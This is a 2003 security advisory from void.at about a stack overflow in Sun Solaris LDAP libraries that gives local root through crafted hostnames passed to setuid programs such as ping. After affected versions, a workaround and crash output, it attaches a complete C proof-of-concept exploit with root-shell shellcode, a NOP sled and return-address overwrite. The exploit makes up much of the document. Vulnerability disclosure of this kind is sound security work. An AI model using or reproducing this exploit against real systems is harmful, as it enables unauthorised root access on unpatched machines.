-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [void.at Security Advisory VSA0309 - mailto:crew at void dot at] Overview ======== Due to a stack overflow bug in the LDAP libraries, it is possible for a local attacker to exploit this bug to get root privilegies. If LDAP is enabled in /etc/nsswitch.conf you can exploit programs using special crafted hostnames. I've also tested it against sendmail (remote) but the hostname is limited to 255 bytes. Affected Versions ================= PKGINST: SUNWlldap NAME: LDAP Libraries CATEGORY: system ARCH: i386 VERSION: 11.8.0,REV=2000.01.08.18.17 BASEDIR: / VENDOR: Sun Microsystems, Inc. DESC: Ldap libraries in for software development of dynamically linked executables PSTAMP: on28-patch-x20020215173655 INSTDATE: Apr 23 2002 17:19 HOTLINE: Please contact your local service provider STATUS: completely installed FILES: 10 installed pathnames 3 shared pathnames 1 linked files 3 directories 4 executables 200 blocks used (approx) Impact ====== Middle. Local root shell if LDAP is enabled in /etc/nsswitch.conf. Workaround: =========== Disable ldap for hosts and ipnodes in /etc/nsswitch.conf Details ======= $ ping aaaa.... Segmentation Fault (core dumped) $ gdb ping core #0 0xdf923f13 in getbyname () from /usr/lib/nss_ldap.so.1 #1 0x61616161 in ?? () Cannot access memory at address 0x61616161 (gdb) It works also for traceroute. To exploit this vulnerabilty we need to modify the shellcode a little bit because there are some bytes that will be written by the program after execution. Sample exploitation session =========================== bash-2.03$ uname -a SunOS mail 5.8 Generic_108529-11 i86pc i386 i86pc bash-2.03$ ./hoagie_solarisldap hoagie_solarisldap local root exploit [*] offset: 0x23f8 [*] return address: 0x8045770 # Exploit ======= Please find attached a demonstration exploit. Discovered by ============= Andi Timeline ======== 03-05-2003: informed Sunsolve Team 03-11-2003: no reply from Sunsolve Team -> public release Credits ======= void.at ================================================================== /*********************************************************** * hoagie_solarisldap.c * * gcc hoagie_solarisldap.c -o hoagie_solarisldap * * Author: Andi * * Greetz to Greuff, philipp and the other hoagie-fellas :-) * * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY * DAMAGE DONE USING THIS PROGRAM. * * * Offsets: 9208 ... without patch 108994-11 * ************************************************************/ #include #define NOP 0x90 #define ORIGSIZE 258 char shellcode[]= /* main: */ "\xeb\x0a" /* jmp initcall */ /* initlcall: */ "\x9a\x01\x02\x03\x5c\x07\x04" /* lcall */ "\xc3" /* ret */ /* jmpz: */ "\xeb\x05" /* jmp setuidcode */ /* initcall: */ "\xe8\xf9\xff\xff\xff" /* call jmpz */ /* setuidcode: */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */ "\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */ /* seteuid(0); */ "\x50" /* pushl %eax */ "\xb0\x8d" /* movb $0x8d, %al */ "\xe8\xe0\xff\xff\xff" /* call initlcall */ /* setuid(0); */ "\x29\xc0" /* subl %eax, %eax */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17, %al */ "\xe8\xd6\xff\xff\xff" /* call initlcall */ "\xeb\x1f" /* jmp callz */ /* start: */ /* execve /bin/sh */ "\x5e" /* popl %esi */ "\x8d\x1e" /* leal (%esi), %ebx */ "\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x19" /* movb %al, 0x19(%esi) */ "\x89\x46\x14" /* movl %eax, 0x14(%esi) */ "\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */ "\x89\x46\x07" /* movl %eax, 0x07(%esi) */ "\xb0\x3b" /* movb $0x3b, %al */ "\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */ "\x51" /* pushl %ecx */ "\x51" /* pushl %ecx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xeb\x18" /* jmp lcall */ /* callz: */ "\xe8\xdc\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */ "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03" /* lcall: */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */ unsigned long getsp(void) { __asm__(" movl %esp,%eax "); } int main(int argc, char **argv) { char buf[512]; int offset = 9208; int retaddr = 0; int i; if (argc > 1) { sscanf(argv[1], "%d", &offset); } printf("hoagie_solarisldap local root exploit\n"); printf("[*] offset: 0x%x\n", offset); memset(buf, NOP, sizeof(buf)); buf[28] = 0xeb; buf[29] = 30; for (i = 0; i < strlen(shellcode); i++) { buf[i + 60] = shellcode[i]; } retaddr = getsp() - offset; printf("[*] return address: 0x%x\n", retaddr); for (i = 0; i < 4 * 25; i += 4){ buf[i + ORIGSIZE + 2] = retaddr & 0xff; buf[i + ORIGSIZE + 3] = (retaddr >> 8 ) &0xff; buf[i + ORIGSIZE + 0] = (retaddr >> 16 ) &0xff; buf[i + ORIGSIZE + 1] = (retaddr >> 24 ) &0xff; } execl("/usr/sbin/ping", "ping", buf, NULL); } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEUEARECAAYFAj5uA2oACgkQzxi8qAgTjUNqtACdGYswAgkvSl9dCR4Vf+MEORa7 qfcAmNxXYiXh7qt4ldYtJZ4lnv6GktY= =pkng -----END PGP SIGNATURE-----